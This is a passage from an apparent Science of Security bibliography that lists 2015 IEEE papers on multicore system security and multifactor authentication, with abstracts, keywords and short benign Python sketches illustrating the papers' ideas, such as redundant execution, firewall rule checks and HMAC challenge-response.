Keywords: multiprocessing systems; operating system kernels; redundancy; safety-critical software; security of data; x86-64 platforms; ARM platforms; alpha particle strikes; commodity hardware trustworthiness; correctness formal verification; cosmic rays; dependability community; hardware redundancy; isolation properties; microkernel mechanisms; modern microkernel; multicore processors; redundant execution techniques; safety critical software systems; security critical software systems; transient fault detection; trustworthy isolation; Hardware; Kernel; Multicore processing; Program processors; Security; Transient analysis; Microkernel; Reliability; SEUs; Security; Trustworthy Systems (ID#: 16-9403)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371963&isnumber=7371940
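
The underlying mechanism — run the same deterministic computation redundantly and compare — is easy to demonstrate at user level, even though the paper implements it inside the microkernel. In the sketch below (ours), two worker processes stand in for redundant cores; a mismatch would indicate a transient fault.

# Minimal sketch of redundant co-execution for transient-fault detection:
# run one deterministic computation on two workers and compare the results.
from multiprocessing import Pool

def work(seed):
    acc = 0
    for i in range(100000):
        acc = (acc * 31 + i + seed) % 1000003
    return acc

if __name__ == "__main__":
    with Pool(2) as pool:
        a, b = pool.map(work, [42, 42])    # identical inputs on two workers
    print("OK" if a == b else "TRANSIENT FAULT DETECTED")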

 

Grammatikakis, M.D.; Petrakis, P.; Papagrigoriou, A.; Kornaros, G.; Coppola, M., "High-Level Security Services Based On A Hardware NoC Firewall Module," in Intelligent Solutions in Embedded Systems (WISES), 2015 12th International Workshop on, pp.73-78, 29-30 Oct. 2015. Doi:  (not provided)

Abstract: Security services are typically based on deploying different types of modules, e.g. firewall, intrusion detection or prevention systems, or cryptographic function accelerators. In this study, we focus on extending the functionality of a hardware Network-on-Chip (NoC) Firewall on the Zynq 7020 FPGA of a Zedboard. The NoC Firewall checks the physical address and rejects untrusted CPU requests to on-chip memory, thus protecting legitimate processes running in a multicore SoC from the injection of malicious instructions or data to shared memory. Based on a validated kernel-space Linux system driver of the NoC Firewall which is seen as a reconfigurable, memory-mapped device on top of AMBA AXI4 interconnect fabric, we develop higher-layer security services that focus on physical address protection based on a set of rules. While our primary scenario concentrates on monitors and actors related to protection from malicious (or corrupt) drivers, other interesting use cases related to healthcare ethics, are also put into the context.

Keywords: field programmable gate arrays; firewalls; multiprocessing systems; network-on-chip; AMBA AXI4 interconnect fabric; Zedboard; Zynq 7020 FPGA; corrupt drivers; hardware NoC firewall module; healthcare ethics; high-level security services; malicious drivers; malicious instructions; multicore SoC; network-on-chip; on-chip memory; physical address protection; reconfigurable memory-mapped device; shared memory; untrusted CPU requests; validated kernel-space Linux system driver; Field programmable gate arrays; Firewalls (computing); Hardware; Linux; Network interfaces; Registers; Linux driver; NoC; firewall; multicore SoC (ID#: 16-9404)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7356985&isnumber=7356973
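
Functionally, the NoC Firewall's check reduces to consulting a rule table of physical address ranges and permitted operations on every request, with default deny. The sketch below captures that logic in software; the address ranges, rule fields, and operation names are invented for illustration, while the real module enforces this on the AXI fabric in hardware.

# Sketch of the firewall's rule check: a table of (base, limit, allowed-ops)
# entries consulted on every master-to-memory request.
RULES = [
    {"base": 0x0000_0000, "limit": 0x0FFF_FFFF, "ops": {"r", "w"}},  # app heap
    {"base": 0x1000_0000, "limit": 0x1FFF_FFFF, "ops": {"r"}},       # shared, read-only
]

def check(addr, op):
    for rule in RULES:
        if rule["base"] <= addr <= rule["limit"]:
            return op in rule["ops"]
    return False                            # default-deny unmapped addresses

for addr, op in ((0x0000_1000, "w"), (0x1000_0040, "w"), (0x3000_0000, "r")):
    print(hex(addr), op, "->", "allow" if check(addr, op) else "reject")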

 

Tuncali, C.E.; Fainekos, G.; Yann-Hang Lee, "Automatic Parallelization of Simulink Models for Multi-core Architectures," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on,  pp. 964-971, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.232

Abstract: This paper addresses the problem of parallelizing existing single-rate Simulink models for embedded control applications on multi-core architectures, considering the communication cost between blocks on different CPU cores. Utilizing the block diagram of the Simulink model, we derive the dependency graph between the different blocks. In order to solve the scheduling problem, we describe a Mixed Integer Linear Programming (MILP) formulation for optimally mapping the Simulink blocks to different CPU cores. Since the number of variables and constraints for the MILP solver grows exponentially as model size increases, solving this problem in a reasonable time becomes harder. To address this issue, we introduce a set of techniques for reducing the number of constraints in the MILP formulation. By using the proposed techniques, the MILP solver finds solutions that are closer to the optimal solution within a given time bound. We study the scalability and efficiency of our approach with synthetic benchmarks of randomly generated directed acyclic graphs. We also use the "Fault-Tolerant Fuel Control System" demo from Simulink and a Diesel engine controller from Toyota as case studies for demonstrating the applicability of our approach to real-world problems.

Keywords: control engineering computing; diesel engines; directed graphs; embedded systems; fault tolerant control; fuel systems; integer programming; linear programming; parallel architectures; processor scheduling; CPU cores; MILP formulation; MILP solver constraints; MILP solver variables; Simulink model parallelization problem; Toyota; block diagram; communication cost; dependency graph; diesel engine controller; embedded control applications; fault-tolerant fuel control system; mixed integer linear programming formulation; multicore architecture; randomly generated directed acyclic graphs; scheduling problem; synthetic benchmarks; Bismuth; Computational modeling; Job shop scheduling; Multicore processing; Optimization; Software packages; Multiprocessing; Simulink; embedded systems; model based development; optimization; task allocation (ID#: 16-9405)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336295&isnumber=7336120
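
The objective the MILP optimizes can be conveyed with a brute-force miniature: enumerate block-to-core assignments and score each by core load plus cross-core communication. The sketch below is ours and is not the paper's formulation; block times, edge costs, and the two-core target are illustrative.

# Tiny stand-in for the MILP: exhaustively map four dependent blocks onto
# two cores, minimizing max core load plus cross-core communication.
import itertools

blocks = {"A": 3, "B": 2, "C": 4, "D": 1}            # execution times
edges = {("A", "B"): 2, ("A", "C"): 1, ("B", "D"): 2, ("C", "D"): 3}

best = None
for assign in itertools.product((0, 1), repeat=len(blocks)):
    placement = dict(zip(blocks, assign))
    load = [sum(t for b, t in blocks.items() if placement[b] == core)
            for core in (0, 1)]
    comm = sum(c for (u, v), c in edges.items() if placement[u] != placement[v])
    cost = max(load) + comm
    if best is None or cost < best[0]:
        best = (cost, placement)
print("cost:", best[0], "placement:", best[1])

Brute force is exponential in the number of blocks, which is precisely why the authors turn to MILP with constraint-reduction techniques for realistic model sizes.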

 

Ye, J.; Songyuan Li; Tianzhou Chen, "Shared Write Buffer to Support Data Sharing Among Speculative Multi-threading Cores," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 835-838, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.287

Abstract: Speculative Multi-threading (SpMT), a.k.a. Thread Level Speculation (TLS), is a prominent research direction for the automatic extraction of thread-level parallelism (TLP), which is increasingly appealing in the multi-core and many-core era. SpMT threads are extracted from a single thread and are tightly coupled by data dependences. Traditional private L1 caches with a coherence mechanism do not suit such intense data sharing among SpMT threads. We propose a Shared Write Buffer (SWB) that resides in parallel with the private L1 caches, but with a much smaller capacity and a short access delay. When a core writes a datum to the L1 cache, it writes the SWB first; when it reads a datum, it reads from the SWB as well as from the L1. Because the SWB is shared among the cores, it can return a datum more quickly than the L1 when the latter must go through a coherence process to load it. In this way, the SWB improves the performance of SpMT inter-core data sharing and mitigates coherence overhead.

Keywords: cache storage; multi-threading; multiprocessing systems; SWB; SpMT intercore data sharing; SpMT thread extraction; TLS; access delay; automatic TLP extraction; coherence overhead mitigation; data dependences; data sharing; datum; performance improvement; private L1 caches; shared write buffer; speculative multithreading cores; thread level parallelism; thread level speculation; Coherence; Delays; Instruction sets; Message systems; Multicore processing; Protocols; Cache; Multi-Core; Shared Write Buffer; SpMT; Speculative Multi-Threading (ID#: 16-9406)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336265&isnumber=7336120
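
The read path the authors propose — probe a small shared write buffer before the private L1 — can be sketched directly. The classes and addresses below are our illustration; real hardware would bound the SWB's capacity and handle speculation rollback, which the sketch ignores.

# Sketch of the SWB read path: a small shared store is probed before the
# private L1, so fresh values from a sibling thread are visible quickly.
class Core:
    def __init__(self, swb):
        self.l1, self.swb = {}, swb        # private L1 vs. shared SWB

    def write(self, addr, value):
        self.swb[addr] = value             # write into the SWB first
        self.l1[addr] = value

    def read(self, addr, memory):
        if addr in self.swb:               # hit: sibling's fresh datum
            return self.swb[addr]
        return self.l1.get(addr, memory.get(addr))

swb, memory = {}, {0x40: "old"}
c0, c1 = Core(swb), Core(swb)
c0.write(0x40, "new")                      # producer thread
print(c1.read(0x40, memory))               # consumer sees "new" via the SWB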

 

Chunqiang Li; Wei Hu; Puzhang Wang; Mengke Song; Xinwei Cao, "A Novel Critical Path Based Routing Method for NOC," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1546-1551, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.159

Abstract: As more and more cores are integrated onto a single chip and connected by links, network on chip (NOC) provides a new on-chip structure. Tasks are mapped to the cores on the chip and have communication requirements according to their relationships. When communication data are transmitted on the network, they need to be given a suitable path to the target cores with low latency. In this paper, we propose a new routing method based on the static critical path for NOC. Multi-threaded tasks are analyzed first and their running paths are marked; the static critical path is found according to the lengths of the running paths. Messages on the critical path are marked as critical messages. When messages arrive at the on-chip routers, the critical messages are forwarded first according to their importance. This routing method has been tested in a simulation environment, and the experimental results show that it can accelerate the transmission of critical messages and improve task performance.

Keywords: network routing; network-on-chip; NOC; chip structure; communication data transmission; communication requirements; critical messages; critical path; critical path based routing method; latency; multithreads; network on chip; running path length; simulation environment; static critical path; target cores; task mapping; task performance improvement; Algorithm design and analysis; Message systems; Multicore processing; Program processors; Quality of service; Routing; System-on-chip; Critical Path; Network on Chip; Routing Method (ID#: 16-9407)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336388&isnumber=7336120
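
At each router the policy amounts to two service classes with FIFO order inside each class. The sketch below (ours) uses a priority queue as a stand-in for the router's arbitration; the message names and the critical flag are illustrative.

# Messages flagged as on the static critical path are dequeued before
# ordinary traffic at each router.
import heapq, itertools

seq = itertools.count()                    # FIFO tie-breaker within a class
outq = []

def enqueue(msg, critical):
    heapq.heappush(outq, (0 if critical else 1, next(seq), msg))

enqueue("data #1", critical=False)
enqueue("ctrl on critical path", critical=True)
enqueue("data #2", critical=False)
while outq:
    _, _, msg = heapq.heappop(outq)
    print("forward:", msg)                 # the critical message leaves first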

 

Raab, M., "Global and Thread-Local Activation of Contextual Program Execution Environments," in Object/Component/Service-Oriented Real-Time Distributed Computing Workshops (ISORCW), 2015 IEEE International Symposium on, pp. 34-41, 13-17 April 2015. doi: 10.1109/ISORCW.2015.52

Abstract: Ubiquitous computing often demands applications to be both customizable and context-aware: Users expect smart devices to adapt to the context and respect their preferences. Currently, these features are not well-supported in a multi-core embedded setup. The aim of this paper is to describe a tool that supports both thread-local and global context-awareness. The tool is based on code generation using a simple specification language and a library that persists the customizations. In a case study and benchmark we evaluate a web server application on embedded hardware. Our web server application uses contexts to represent user sessions, language settings, and sensor states. The results show that the tool has minimal overhead, is well-suited for ubiquitous computing, and takes full advantage of multi-core processors.

Keywords: Internet; multiprocessing systems; program compilers; programming environments; software libraries; specification languages; ubiquitous computing; Web server application; code generation; contextual program execution environments; global context-awareness; language settings; multicore processors; sensor states; smart devices; software library; specification language; thread-local context-awareness; ubiquitous computing; user sessions; Accuracy; Context; Hardware; Instruction sets; Security; Synchronization; Web servers; context oriented programming; customization; multi-core; persistency; ubiquitous computing (ID#: 16-9408)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160121&isnumber=7160107
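
The two activation scopes in the paper map naturally onto a process-wide dictionary and a thread-local overlay consulted first. The sketch below is our reading of that layering, not the generated code from the authors' tool; the context keys (language, theme) are illustrative.

# Global context for process-wide customizations; a threading.local holds
# per-session (thread) overrides, looked up local-first.
import threading

GLOBAL_CTX = {"language": "en", "theme": "plain"}
_local = threading.local()

def set_local(**kv):
    _local.ctx = {**getattr(_local, "ctx", {}), **kv}

def lookup(key):
    return getattr(_local, "ctx", {}).get(key, GLOBAL_CTX.get(key))

def session(lang):
    set_local(language=lang)               # per-thread activation
    print(threading.current_thread().name, "->", lookup("language"), lookup("theme"))

threads = [threading.Thread(target=session, args=(l,)) for l in ("de", "fr")]
for t in threads: t.start()
for t in threads: t.join()
print("main ->", lookup("language"))       # falls back to the global context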


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Multifactor Authentication 2015

 

 
SoS Logo

Multifactor Authentication 2015

 

Multifactor authentication is of general interest within cryptography.  For the Science of Security community, it relates to human factors, resilience, and metrics.  The work cited here was presented in 2015.


Pavlovski, C.; Warwar, C.; Paskin, B.; Chan, G., "Unified Framework for Multifactor Authentication," in Telecommunications (ICT), 2015 22nd International Conference on, pp. 209-213, 27-29 April 2015. doi: 10.1109/ICT.2015.7124684

Abstract: The progression towards the use of mobile network devices in all facets of personal, business and leisure activity has created new threats to users and challenges to the industry to preserve security and privacy. Whilst mobility provides a means for interacting with others and accessing content in an easy and malleable way, these devices are increasingly being targeted by malicious parties in a variety of attacks. In addition, web technologies and applications are supplying more function and capability that attracts users to social media sites, e-shopping malls, and for managing finances (banking). The primary mechanism for authentication still employs a username and password based approach. This is often extended with additional (multifactor) authentication tools such as one time identifiers, hardware tokens, and biometrics. In this paper we discuss the threats, risks and challenges with user authentication and present the techniques to counter these problems with several patterns and approaches. We then outline a framework for supplying these authentication capabilities to the industry based on a unified authentication hub.

Keywords: Internet; authorisation; mobile computing; Web applications; Web technologies; authentication capabilities; e-shopping malls; finance management; mobile network devices; multifactor authentication tool; password based approach; social media sites; unified authentication hub; user authentication; username based approach; Authentication; Banking; Biometrics (access control); Business; Mobile communication; Mobile handsets; mobile networks; multifactor authentication; security; unified threat management (ID#: 16-9159)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7124684&isnumber=7124639

 

Adukkathayar, A.; Krishnan, G.S.; Chinchole, R., "Secure Multifactor Authentication Payment System Using NFC," in Computer Science & Education (ICCSE), 2015 10th International Conference on, pp. 349-354, 22-24 July 2015. doi: 10.1109/ICCSE.2015.7250269

Abstract: Financial transactions are now commonly made with cards or internet banking. A person may have multiple bank accounts across several banks, which makes it difficult to manage transactions: he or she either has to carry several cards or use several bank websites to accomplish them. This situation demands a simple, secure and high-tech system for making transactions. We propose such a system, using the latest technologies like NFC and multifactor authentication, which can be used on any NFC-enabled smartphone. The multifactor authentication system uses a 4-digit PIN as the knowledge factor, an NFC-enabled smartphone (instead of cards) as the possession factor, and the face of the user as the inherence factor for the purpose of authentication. The proposed system, which can be implemented as a cross-platform mobile application, not only allows the user to make secure transactions, but also allows him or her to make transactions from multiple accounts.

Keywords: bank data processing; message authentication; mobile computing; near-field communication; smart phones;4-digit PIN;NFC enabled smartphone; bank accounts; cross-platform mobile application; financial transactions; inherence factor; knowledge factor; near field communication; online bank transactions; possession factor; secure multifactor authentication payment system; secure transactions; Authentication; Face; Face recognition; Mobile communication; Online banking; Receivers; Authentication; Consumer Storage; Mobile computing; Multifactor; NFC; Near Field Communication; Peer-to-peer; Security (ID#: 16-9160)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7250269&isnumber=7250193

 

Mandyam, G.D.; Milikich, M., "Leveraging Contextual Data for Multifactor Authentication in the Mobile Web," in Communication Systems and Networks (COMSNETS), 2015 7th International Conference on, pp. 1-4, 6-10 Jan. 2015. doi: 10.1109/COMSNETS.2015.7098728

Abstract: Identity and authentication in the mobile web are important for many types of applications that benefit users, including payments. The mobile web today has several traditional approaches to authentication that allow sensitive applications to take place. Moving forward, however, contextual data can have a place in the area of authentication. Sensor information available on smartphones can provide information about user context that can serve either to augment existing authentication techniques or to provide additional authentication factors in their own right.

Keywords: Internet; authorisation; mobile computing; smart phones; authentication factors; contextual data; mobile Web authentication; multifactor authentication; sensitive applications; sensor information; smartphones; Browsers; Conferences; Geology; authentication; authorization (ID#: 16-9161)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7098728&isnumber=7098633

 

Dharavath, K.; Talukdar, F.A.; Laskar, R.H., "Facial Image Processing in Conjunction with Password for Intelligent Access Control," in TENCON 2015 - 2015 IEEE Region 10 Conference, pp. 1-5, 1-4 Nov. 2015. doi: 10.1109/TENCON.2015.7373181

Abstract: In most access control systems employed in organizations, one or more authentication steps are used to protect assets. These authentication systems in general involve one or more knowledge-based or possession-based authentication steps, or sometimes a combination of both, in order to provide high security. However, with the advance of technology these methods are increasingly vulnerable to soft attacks, i.e. more prone to tampering. Hence there is a need for an authentication factor that is practically impossible to synthesize. We present a framework for a secured intelligent access control system using two authentication factors, namely an inherence factor and a knowledge factor. A facial image and a personalized unique password are used as the inherence and knowledge factors, respectively. A Gabor filter along with a subspace technique is employed for feature extraction and for matching test and training images. The proposed two-factor authentication system reports far better results than other access control systems in the literature.

Keywords: Gabor filters; face recognition; feature extraction; image filtering; image matching; Gabor filter; authentication systems; facial image processing; feature extraction; inherence factor; intelligent access control system; knowledge factor; matching test; personalized password; possession-based authentication step; soft attacks; subspace technique; tampering problem; training images; Access control; Authentication; Face; Face recognition; Feature extraction; Gabor filters; Principal component analysis; Face recognition; Gabor features local binary pattern; multifactor authentication; principal component analysis; statistical features; texture features (ID#: 16-9162)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7373181&isnumber=7372693

 

Albahbooh, N.A.; Bours, P., "A Mobile Phone Device as a Biometrics Authentication Method for an ATM Terminal," in Computer and Information Technology; Ubiquitous Computing and Communications; Dependable, Autonomic and Secure Computing; Pervasive Intelligence and Computing (CIT/IUCC/DASC/PICOM), 2015 IEEE International Conference on, pp. 2017-2024, 26-28 Oct. 2015. doi: 10.1109/CIT/IUCC/DASC/PICOM.2015.299

Abstract: The use of mobile phone devices is expanding rapidly, and they have become essential tools that offer competitive business advantages in today's growing world of global computing environments. A mobile phone is a suitable tool for multifactor authentication: it can provide a powerful and easy-to-use authentication device for accessing any service securely, such as an ATM terminal, and can increase the level of protection for critical and sensitive information. In this paper, we present a protocol that provides more secure ATM authentication using biometrics (fingerprint or face) on a mobile phone device, under the restriction that no changes can be made to the existing physical infrastructure. Furthermore, we give an overview of current ATM authentication methods utilizing mobile devices as a factor in the authentication process. Moreover, we outline a high-level security analysis of the proposed authentication protocol.

Keywords: banking; biometrics (access control); cryptographic protocols; mobile computing; mobile handsets; ATM authentication methods; ATM terminal; authentication protocol; biometrics authentication method; global computing environments; high level security analysis; mobile phone device; multifactor authentication; Authentication; Biometrics (access control); Mobile handsets; Online banking; Protocols; ATM Terminal; Authentication Protocol; Biometrics; Fuzzy Vault; Mobile Phone Device  (ID#: 16-9163)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7363345&isnumber=7362962

 

Dostalek, L.; Ledvina, J., "Strong Authentication for Internet Mobile Application," in Applied Electronics (AE), 2015 International Conference on, pp. 23-26, 8-9 Sept. 2015. Doi: (not provided)

Abstract: 4G networks utilize Voice over LTE (VoLTE). VoLTE uses authentication mechanisms similar to HTTP. It is therefore possible for a web client on a mobile device to use an authentication mechanism originally designed for VoLTE [10], i.e. the AKA mechanism, which uses the UICC (USIM / ISIM). This mechanism authenticates the user to the mobile network; however, web applications may be provided by another entity. This contribution discusses the possibility of strong authentication for applications running on mobile devices. It deals with the possibility of combining the AKA algorithm with other authentication algorithms. The combination of the two algorithms creates strong multifactor authentication, which is suitable for applications demanding highly secure authentication such as internet banking or internet access to government applications.

Keywords: 4G mobile communication; Internet; Long Term Evolution; mobile computing; security of data; 4G networks; AKA mechanism; HTTP; ISIM; Internet mobile application; UICC; USIM; VoLTE; mobile network; secure authentication; strong multifactor authentication; voice over LTE; Authentication; Mobile communication; Mobile computing; Mobile handsets; Resistance; Smart cards; Authentication; Mobile Application; Security; Smart Card; Strong Password Authentication (ID#: 16-9164)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7301048&isnumber=7301036

 

Johnston, A.H.; Weiss, G.M., "Smartwatch-Based Biometric Gait Recognition," in Biometrics Theory, Applications and Systems (BTAS), 2015 IEEE 7th International Conference on, pp. 1-6, 8-11 Sept. 2015. doi: 10.1109/BTAS.2015.7358794

Abstract: The advent of commercial smartwatches provides an intriguing new platform for mobile biometrics. Like their smartphone counterparts, these mobile devices can perform gait-based biometric identification because they too contain an accelerometer and a gyroscope. However, smartwatches have several advantages over smartphones for biometric identification because users almost always wear their watch in the same location and orientation. This location (i.e. the wrist) tends to provide more information about a user's movements than the most common location for smartphones (pockets or handbags). In this paper we show the feasibility of using smartwatches for gait-based biometrics by demonstrating the high levels of accuracy that can result from smartwatch-based identification and authentication models. Applications of smartwatch-based biometrics range from a new authentication challenge for use in a multifactor authentication system to automatic personalization by identifying the user of a shared device.

Keywords: biometrics (access control); gait analysis; identification; image recognition; message authentication; mobile computing; biometric gait recognition; multifactor authentication system; smartwatch-based biometrics; smartwatch-based identification; Accelerometers; Authentication; Biosensors; Gait recognition; Gyroscopes; Performance evaluation (ID#: 16-9165)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7358794&isnumber=7358743
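
A typical front end for this kind of accelerometer biometric is windowing plus per-axis statistics, which is simple to sketch. The code below is ours, with a synthetic 3-axis signal and arbitrary window sizes; it produces the sort of feature vectors a classifier in such a system might consume, and is not the authors' feature set.

# Slice a 3-axis accelerometer stream into fixed windows and compute simple
# per-axis statistics (mean, deviation, range) as gait features.
import math, statistics

def windows(signal, size=100, step=50):
    for start in range(0, len(signal) - size + 1, step):
        yield signal[start:start + size]

def features(win):
    feats = []
    for axis in range(3):
        vals = [s[axis] for s in win]
        feats += [statistics.mean(vals), statistics.pstdev(vals),
                  max(vals) - min(vals)]
    return feats

stream = [(math.sin(t / 7.0), math.cos(t / 9.0), 0.1 * (t % 11)) for t in range(400)]
for i, win in enumerate(windows(stream)):
    print("window", i, [round(f, 3) for f in features(win)][:4], "...")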

 

Shah, Y.; Choyi, V.; Subramanian, L., "Multi-factor Authentication as a Service," in Mobile Cloud Computing, Services, and Engineering (MobileCloud), 2015 3rd IEEE International Conference on, pp. 144-150, March 30 2015-April 3 2015. doi: 10.1109/MobileCloud.2015.35

Abstract: An architecture for providing multi-factor authentication as a service is proposed, resting on the principle of a loose coupling and separation of duties between network entities and end user devices. The multi-factor authentication architecture leverages Identity Federation and Single-Sign-On technologies, such as the OpenID framework, in order to provide for a modular integration of various factors of authentication. The architecture is robust and scalable enabling service providers to define risk-based authentication policies by way of assurance level requirements, which map to concrete authentication factor capabilities on user devices.

Keywords: cloud computing; message authentication; OpenID framework; assurance level requirements; authentication factor capabilities; identity federation; multifactor authentication architecture; multifactor authentication as a service; risk-based authentication policies; single-sign-on technologies; user devices; Authentication; Biometrics (access control); Mobile communication; Mobile computing; Protocols; Servers; OpenID; assurance level; biometrics; federated identity; multi-factor authentication; single-sign-on (ID#: 16-9166)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7130879&isnumber=7130853

 

Thiranant, N.; Young Sil Lee; HoonJae Lee, "Performance Comparison Between RSA and Elliptic Curve Cryptography-Based QR Code Authentication," in Advanced Information Networking and Applications Workshops (WAINA), 2015 IEEE 29th International Conference on, pp. 278-282, 24-27 March 2015. doi: 10.1109/WAINA.2015.62

Abstract: In QR Code authentication techniques, the smartphone has become a great tool and plays an important role in the authentication process. It has been used in various fields over the internet, especially in multi-factor authentication. However, security aspects should be well taken care of. In this paper, a performance comparison between RSA- and Elliptic Curve Cryptography-based QR Code authentication is proposed. It mainly focuses on QR Codes, as they are now widely used all over the world. In addition, existing and related work has leveraged the use of RSA, but no work has been done on Elliptic Curve Cryptography. The experimental results and comparisons are shown and described in this paper.

Keywords: codes; public key cryptography; smart phones; QR code authentication technique; RSA; elliptic curve cryptography-based QR code authentication; internet; multifactor authentication; smartphone; Authentication; Elliptic curve cryptography; Elliptic curves; Encryption; Data encryption; Elliptic Curve Cryptography; Mobile application; Public-key algorithm; QR Code (ID#: 16-9167)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7096187&isnumber=7096097

 

Guifen Zhao; Ying Li; Liping Du; Xin Zhao, "Asynchronous Challenge-Response Authentication Solution Based on Smart Card in Cloud Environment," in Information Science and Control Engineering (ICISCE), 2015 2nd International Conference on, pp. 156-159, 24-26 April 2015. doi: 10.1109/ICISCE.2015.42

Abstract: In order to achieve secure authentication, an asynchronous challenge-response authentication solution is proposed. An SD key, encryption cards or an encryption machine provide the encryption service. A hash function, a symmetric algorithm and a combined secret key method are adopted for authentication. Authentication security is guaranteed by the properties of the hash function, the combined secret key method and the one-time authentication token generation method. Random numbers, a one-time combined secret key and a one-time token are generated on the basis of the smart card, encryption cards and cryptographic techniques, which can prevent guessing attacks. Moreover, replay attacks are avoided because of the time factor. The authentication solution is applicable to cloud application systems to realize multi-factor authentication and enhance the security of authentication.

Keywords: cloud computing; message authentication; private key cryptography; smart cards; SD key; asynchronous challenge-response authentication solution; authentication security; cloud application systems; combined secret key method; cryptographic technique; encryption cards; encryption machine; encryption service; hash function; multifactor authentication; one-time authentication token generation method; one-time combined secret key; random number generation; replay attack; smart card; symmetric algorithm; time factor; Authentication; Encryption; Servers; Smart cards; Time factors; One-time password; asynchronous challenge-response authentication; multi-factor authentication; smart card (ID#: 16-9168)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7120582&isnumber=7120439
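
The general shape of such a scheme — a random server challenge answered with a keyed hash over the challenge and a timestamp, with stale timestamps rejected — can be sketched with standard primitives. The code below is our generic illustration, not the paper's combined-secret-key construction; the shared key stands in for material held on the smart card.

# Hash-based challenge-response with a time factor: the server issues a
# random challenge, the client answers with HMAC(key, challenge || timestamp),
# and stale timestamps are rejected to stop replays.
import hmac, hashlib, os, time

KEY = os.urandom(32)                       # stands in for the smart card's key
MAX_SKEW = 30                              # seconds

def client_response(challenge):
    ts = str(int(time.time())).encode()
    tag = hmac.new(KEY, challenge + ts, hashlib.sha256).hexdigest()
    return ts, tag

def server_verify(challenge, ts, tag):
    if abs(time.time() - int(ts)) > MAX_SKEW:
        return False                       # replay of an old token
    expected = hmac.new(KEY, challenge + ts, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag)

challenge = os.urandom(16)                 # fresh per authentication attempt
ts, tag = client_response(challenge)
print("authenticated:", server_verify(challenge, ts, tag))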

 

Amin, R.; Biswas, G.P., "Anonymity Preserving Secure Hash Function Based Authentication Scheme for Consumer USB Mass Storage Device," in Computer, Communication, Control and Information Technology (C3IT), 2015 Third International Conference on, pp. 1-6, 7-8 Feb. 2015. doi: 10.1109/C3IT.2015.7060190

Abstract: A USB (Universal Serial Bus) mass storage device makes storage accessible to a host computing device and enables file transfers after mutual authentication between the authentication server and the user is completed. It is a very popular device because of its portability, large storage capacity and high transmission speed. To protect the privacy of a file transferred to a storage device, several security protocols have been proposed, but none of them is completely free from security weaknesses. Recently, He et al. proposed a multi-factor-based security protocol which is efficient, but the protocol is not applicable for practical implementation, as it does not provide a password change procedure, an essential phase in any password-based user authentication and key agreement protocol. As the computation and implementation of the cryptographic one-way hash function is more trouble-free than other existing cryptographic algorithms, we propose a lightweight, anonymity-preserving three-factor user authentication and key agreement protocol for consumer mass storage devices and analyze the proposed protocol using BAN logic. Furthermore, we present an informal security analysis of the proposed protocol and confirm that the protocol is completely free from security weaknesses and applicable for practical implementation.

Keywords: cryptographic protocols; file organisation; BAN logic; USB device; anonymity preserving secure hash function based authentication scheme; anonymity preserving three factor user authentication; authentication server; consumer USB mass storage device; consumer mass storage devices; cryptographic algorithms; cryptographic one-way hash function; file transfers; host computing device; informal security analysis; key agreement protocol; multifactor based security protocols; password based user authentication; password change procedure; storage capacity; universal serial bus mass storage device; Authentication; Cryptography; Protocols; Servers; Smart cards; Universal Serial Bus; Anonymity; Attack; File Secrecy; USB MSD; authentication (ID#: 16-9169)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7060190&isnumber=7060104

 

Longji Tang; Liubo Ouyang; Wei-Tek Tsai, "Multi-factor Web API Security for Securing Mobile Cloud," in Fuzzy Systems and Knowledge Discovery (FSKD), 2015 12th International Conference on, pp. 2163-2168, 15-17 Aug. 2015. doi: 10.1109/FSKD.2015.7382287

Abstract: Mobile Cloud Computing is gaining popularity among both mobile users and enterprises. With mobile-first becoming enterprise IT strategy and more enterprises exposing their business services to the mobile cloud through Web APIs, the security of mobile cloud computing becomes a main concern and a key success factor as well. This paper presents the security challenges of mobile cloud computing and defines an end-to-end secure mobile cloud computing reference architecture. It then shows that Web API security is key to the end-to-end security stack, and specifies traditional API security mechanisms as well as two multi-factor Web API security strategies and mechanisms. Finally, it compares the security features provided by ten API gateway providers.

Keywords: application program interfaces; cloud computing; mobile computing; security of data; API gateway providers; API security mechanism; business services; end-to-end secure mobile cloud computing; enterprise IT strategy; mobile cloud computing; mobile users; multifactor Web API security; securing mobile cloud; Authentication; Authorization; Business; Cloud computing; Mobile communication; end-to-end; mobile cloud; security mechanism; web API (ID#: 16-9170)

